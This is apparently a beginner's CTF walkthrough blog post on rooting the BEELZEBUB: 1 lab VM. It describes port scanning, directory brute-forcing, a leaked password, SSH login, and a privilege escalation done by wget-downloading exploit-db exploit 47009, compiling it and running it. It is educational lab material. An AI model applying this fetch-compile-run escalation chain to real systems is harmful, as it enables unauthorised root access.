In this article, I will be providing a walkthrough for the BEELZEBUB: 1 vulnerable VM from Vulhub.com. This is a easy rated CTF so it should not to too hard to follow along if your a beginner. This box requires a bit of enumeration and some creativity at times but overall it’s not head banging hard.
First of all, lets find our vulnerable machine:
Our vulnerable machine’s IP is “192.168.99.9". Now that we found the machine lets do a basic “nmap” scan to see what ports are open:
We see that port 80(http), 22(ssh) are open. For now lets take a look at port 80(http). The fact that it is open most likely means a webpage must be available. Which turns out to be true:
So now lets run a directory transversal tool called “dirsearch” against our vulnerable Machine and see what pops up:
Seem like we get some interesting results. And so after visiting many of the found URLs searching for clues. In the page source of /index.php a hidden message is reveled to us:
Now the two highlighted words “beelzebub” and “md5” are the two keys to our next hint. Since md5 is a hash function and “beelzebub” is surrounded in quotation marks. Lets convert “beelzebub” into a md5 hash and lets see what we can do with it:
And after some playing around with ideas. I found that taking the now converted “beelzebub” md5 hash. And placing it into the trusty “dirsearch” command we are met with some positive results:
And after some shifting through some of the new founded directories we can find a web page at “wp-content/uploads/Talk To VALAK/index.php”.
In the webpage we encounter input box and a button to “Say Hi to VALAK!”. After giving a name and click a button we get prompt back with “VALAK: <name>”. Now lets look further into the request sent after clicking the button. Right Click and open up “inspect element” then click on the “network” tab.
And then click on our POST request we made and look over to the response header and scroll down. And look at what we found “M4k3Ad3a1” a password.
But what is this a password for? The SSH login of course remember the open port 22(SSH). Although its a password for what user? Lets find our answer with a “wpscan” for usernames:
Looks like we found two. We will be using the username “krampus” for our ssh login.
Now that we login we need to see if we have root root privileges. Lets run the id command and see if we are in the sudoers group;
Looks like we are not. So let’s see if we can escalate privileges to root. And after some testing I decided to take a look into the “.bash_history” file by using the “cat” command. To see what can we find and I found some activity of interest:
if you cat “.bash_history” and scroll down a bit. You see some interesting commands:
- “wget https://www.exploit-db.com/download/47009”: Downloading a file from the internet with a “wget” command.
- “mv 47009 ./exploit.c”: renaming the file to “exploit.c”.
- “gcc exploit.c -o exploit”: using “gcc” with the tag of “-o” to compile the file.
- “./exploit”: The file “exploit” is being executed.
Before we follow along with the commands. lets download the “4700" file with the “wget” command so we can do a small investigation:
Let “cat” the file and see what pops up:
Looks like it’s a privilege escalation vulnerability lets follow the steps in the “.bash_history” file and execute it and see what happens:
looks like we now have root access: